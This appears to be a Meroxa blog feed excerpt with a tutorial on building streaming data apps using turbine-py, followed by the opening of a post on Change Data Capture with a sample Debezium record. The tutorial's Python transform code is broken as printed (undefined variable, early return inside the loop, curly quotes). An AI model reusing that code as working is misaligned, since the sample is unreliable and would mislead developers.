&lt;p&gt;For today’s web apps, a common area of complexity and limitation centers around the system-to-system interaction model. While web apps thrive at addressing user-to-system interactions, the lines can get blurry when it comes to processing the data generated by those interactions.&lt;/p&gt;
&lt;p&gt;At a high level, many questions arise when engineers and developers try to hash out responsibilities when it comes to data processing. How much data transformation and handling can be done by the web app? Should the web app do any of it, or should all data be handed off to other systems to process?&lt;/p&gt;
&lt;p&gt;As an example, the engineers working on web apps typically aren’t deeply familiar with the complexities of streaming data processing. Often, this sort of work is handed off to another backend system and a team that is responsible for data processing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How can data apps solve these complex data processing problems while retaining the familiarity of web apps in code and project structure?&lt;/strong&gt; One of those ways is with&lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;turbine-py&lt;/a&gt;, a Python package built specifically for creating data apps.&lt;/p&gt;
&lt;p&gt;But first, let’s dive into the benefits that data apps provide and how they help engineers solve complex data processing problems.&lt;/p&gt;
&lt;h3&gt;How Data Apps Solve Problems&lt;/h3&gt;
&lt;p&gt;It’s well known that streaming with real-time or near-real-time data processing is important for modern data processing applications, but it’s also incredibly complicated. Data apps solve these issues by handing off the complexity of the underlying streaming infrastructure.&lt;/p&gt;
&lt;p&gt;Data apps are built in such a way that they can handle event-driven streams of data, respond in real-time, and scale to use cloud-native best practices. Engineers can focus on building applications that solve complex problems rather than worrying about the complexity of processing streaming data or the infrastructure needed to support those technologies. Typically, managing these technologies correctly requires a dedicated team of engineers.&lt;/p&gt;
&lt;h3&gt;Benefits of Data Apps&lt;/h3&gt;
&lt;p&gt;Data apps — like those built with Turbine — have several benefits that extend from this reduction of complexity.&lt;/p&gt;
&lt;p&gt;First, by allowing developers to focus on code rather than on managing complex infrastructure and cloud-related operations, data apps free up time and energy for developers so that they can focus on the code that matters: the application code itself.&lt;/p&gt;
&lt;p&gt;Also, the speed at which new engineers can become familiar with and contribute to codebases increases dramatically. When less time is spent understanding streaming architecture and managing those resources, more effort can be spent on the core of the application logic.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Let’s look at a simple data app built using Turbine to see these benefits in action.&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;Example of a Data App Using Turbine&lt;/h3&gt;
&lt;p&gt;Currently, Turbine data apps can be written with&lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt;,&lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; In this example, we will use Python. We’ll solve a data processing problem that is common for many organizations.&lt;/p&gt;
&lt;p&gt;In our sample problem, we have streaming records generated by our users in a web app, and those records need to be processed into a Data Lake, with transformation applied for later analytics by business users.&lt;/p&gt;
&lt;p&gt;Turbine fits the use case for this problem perfectly, providing a data app framework for responding to real-time data while being able to scale in the cloud.&lt;/p&gt;
&lt;h3&gt;Tooling setup&lt;/h3&gt;
&lt;p&gt;First, we install the Meroxa CLI to help with the scaffolding of a Turbine data app. We follow these&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide/&quot;&gt;installation instructions&lt;/a&gt;. We&lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SB3aGZKOHhRaFhsTkJPTTV5VTd2ajhta1M1bHZpSmpWYqFupWxvZ2luo3RpZNkgWlFfc0pjdGFDR3R3NzYzZ3RjVTlONjgxMVFZNDUxN3mjY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=TUhfNWw5cUlDYldaUGZxbmp3SzhUdV8tWlZvaUVhTko1YnNzTmI2N3otUQ%3D%3D&amp;#x26;code_challenge=13yK1_pys2HgZOj47HTpiSnmEmTt24WBFTQbiLlioUg&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;set up our Meroxa account&lt;/a&gt; and then log in via the CLI.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;brew tap meroxa/taps&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; brew &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; meroxa&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we install the&lt;em&gt;turbine-py&lt;/em&gt; package. Then, we initialize our Python data app, creating a clean template.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;pip3 &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt; turbine-py&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app init data-warehouse — lang python — path ~/src&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to start developing our Python data app! When we initialized our app, the following files were automatically generated for us as our template:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;- main.py
- app.json
- __init__.py
- fixtures
— demo-cdc.json
— demo-no-cdc.json&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Writing our first Turbine data app&lt;/h3&gt;
&lt;p&gt;There are five important concepts for writing Turbine data apps, which include:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Turbine class (provides need functionality)&lt;/li&gt;
&lt;li&gt;Data processing function(s)&lt;/li&gt;
&lt;li&gt;Resources (datastores)&lt;/li&gt;
&lt;li&gt;Records (collection of data)&lt;/li&gt;
&lt;li&gt;Write (push data out)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The&lt;strong&gt;Turbine class&lt;/strong&gt; itself provides access to the necessary components to build your data app with minimal code. Of course, you will have one or more&lt;strong&gt;data processing functions&lt;/strong&gt; or methods to apply transformations to your records.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Resources&lt;/strong&gt; in Turbine will allow you to connect to your data sources.&lt;strong&gt;Records&lt;/strong&gt; are simply a collection of data that your data app will process. Lastly,&lt;strong&gt;writing&lt;/strong&gt; will push the processed data back out of the data app. You can&lt;a href=&quot;https://docs.meroxa.com/platform/resources/overview/#configuration&quot;&gt;configure&lt;/a&gt; your Resources and Destinations in Meroxa.&lt;/p&gt;
&lt;p&gt;Since we don’t need to worry about the complexity of consuming a stream of records or the technical requirements related to the source streaming technology, we can focus on writing the transformation function that takes individual records and transforms them as needed.&lt;/p&gt;
&lt;h3&gt;Writing the Code&lt;/h3&gt;
&lt;p&gt;We will write the code for our data app in &lt;code class=&quot;language-text&quot;&gt;main.py&lt;/code&gt;, which will be our entry point.&lt;/p&gt;
&lt;p&gt;First, we will import the needed Python packages into our &lt;code class=&quot;language-text&quot;&gt;main.py&lt;/code&gt; code.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Turbine
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;runtime &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Record&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, we will write our Python class that inherits from the Turbine class to process our streaming user records.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;DataLake&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	&lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@staticmethod&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;“user_activity”&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;“click_stream”&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;process&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; transform&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        destination_db &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;resources&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;“data_lake”&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination_db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; “user_analytics”&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This simple class is straightforward to follow, as the Turbine data app abstracts away the details of complex stream processing. There are four simple steps encapsulated inside our &lt;strong&gt;run&lt;/strong&gt; method.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Connect to a Meroxa-configured &lt;strong&gt;source&lt;/strong&gt; system.&lt;/li&gt;
&lt;li&gt;Pull streaming &lt;strong&gt;records&lt;/strong&gt; from the source.&lt;/li&gt;
&lt;li&gt;Transform the streaming records as needed, yielding the set of &lt;strong&gt;processed&lt;/strong&gt; records.&lt;/li&gt;
&lt;li&gt;Connect to a Meroxa-configured &lt;strong&gt;destination&lt;/strong&gt; to &lt;strong&gt;write&lt;/strong&gt; our processed records.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;With the data flow of our app written, the only remaining step is to write the transformation function that will process our streaming user records. In our example case, our clickstream records contain a field with first and last names concatenated together, like “John Doe.” We simply need to split this field into separate records — first_name and last_name — before ingesting it into a Data Lake.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;transform&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;user_stream&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; t&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;List&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; t&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;List&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	updated &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; user_click &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; user_stream&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
		user_click_to_update &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
		full_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; value_to_update&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;“payload”&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;“user”&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;“name”&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;split&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;‘ ‘&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		first_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; full_name&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
		last_name &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; full_name&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
		updated&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;append&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
		Record&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; value&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;“first_name” &lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 
			first_name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; “last_name”&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; last_name&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; timestamp&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;user_click&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;timestamp&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; updated&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With a little configuration and setup,&lt;strong&gt;our Turbine data app can ingest and process complex streaming data, and it does so with very few lines of code&lt;/strong&gt;!&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Data apps, though relatively new, bring with them a whole host of benefits. These benefits include the efficiency and streamlining of processes along with the simplicity of onboarding new engineers. Building data apps with a tool like Turbine is a perfect approach to today’s complex real-time and near-real-time data processing needs. The ability to approach a normally complicated data problem with a straightforward codebase — while offloading the complexity related to architecture and streaming data — is a game-changer for developers.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[A Proposal for Better Interoperability with Change Data Capture]]></title><description><![CDATA[Change Data Capture (CDC) is a general term for a mechanism that communicates not just the current state of some data in an upstream resource.]]></description><link>https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture</link><guid isPermaLink="false">https://meroxa.com/blog/a-proposal-for-better-interoperability-with-change-data-capture</guid><dc:creator><![CDATA[Ali Hamidi]]></dc:creator><pubDate>Thu, 02 Jun 2022 16:39:00 GMT</pubDate><content:encoded>&lt;h3&gt;What is Change Data Capture?&lt;/h3&gt;
&lt;p&gt;Change Data Capture (CDC) is a general term for a mechanism that communicates not just the current state of some data in an upstream resource, but the actual operation that caused the change in that data.&lt;/p&gt;
&lt;p&gt;Consider the case of traditional (non-CDC) data integration, where we have a pipeline that is pulling records from a Postgres operation database at some regular interval. In this case, what you end up with is a series of snapshots of what the database looked like whenever that particular interval lands.&lt;/p&gt;
&lt;p&gt;A small improvement would be incremental syncing, where we look only for new records and pull those instead of every record each time. This is surely better since it is (generally) magnitudes more efficient.&lt;/p&gt;
&lt;p&gt;However, CDC can improve this further by not only providing new records but any record that was changed and it will also update details around the operation that triggered the change. An example of this would be we have a record that was updated (i.e. a single field was updated with a new value). CDC can provide additional metadata indicating that the record was an update and depending on the resource/tooling can even capture the before and after states, highlighting the exact change.&lt;/p&gt;
&lt;p&gt;It’s clear that CDC provides numerous advantages, so why isn’t it used everywhere for everything?&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://miro.medium.com/max/1120/1*3nZAEJsjz95oGu_q4BCIiQ.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Kafka Connect and CDC Right now&lt;/h3&gt;
&lt;p&gt;We can’t really discuss CDC without talking about&lt;a href=&quot;https://debezium.io/&quot;&gt;Debezium&lt;/a&gt;. Debezium is the umbrella project for a collection of Kafka Connect connectors focused on CDC maintained by the team at Red Hat.&lt;/p&gt;
&lt;p&gt;In our opinion, the Debezium connectors are excellent. They’re well designed, battle-tested, and well documented.&lt;/p&gt;
&lt;p&gt;Here’s an example of a CDC record from the Debezium Postgres Source Connector:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	  &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;oldemail@example.com&quot;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;first_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Anne Marie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;last_name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Kretchmar&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;newemail@example.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;source&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;version&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;2.0.0.Alpha1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;connector&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;PostgreSQL_server&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1559033904863&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;snapshot&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;db&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;public&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;table&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customers&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;txId&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;556&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;lsn&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;24023128&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      &lt;span class=&quot;token string-property property&quot;&gt;&quot;xmin&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;op&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;ts_ms&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1465584025523&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this example, a user’s email has been updated in-place, so an&lt;em&gt;update&lt;/em&gt;record (“op”: “u”) was emitted showing the previous email (&lt;code class=&quot;language-text&quot;&gt;oldemail@example.com&lt;/code&gt;) and the new one (&lt;code class=&quot;language-text&quot;&gt;newemail@example.com&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Using the Debezium connectors, you can build downstream apps that consume this data and intelligently act on each type of operation.&lt;/p&gt;
&lt;p&gt;Where things start to fall apart is once you start looking into the sink (or destination) side of data integration. Very few Kafka Connect sink connectors can take advantage of the CDC data provided by the Debezium connectors.&lt;/p&gt;
&lt;p&gt;In many cases you’re forced to use a provided&lt;a href=&quot;https://debezium.io/documentation/reference/2.0/transformations/event-flattening.html&quot;&gt;transform&lt;/a&gt; to “unwrap” the records (effectively stripping away all of the CDC data), leaving only the final (”after”) state of the record.&lt;/p&gt;
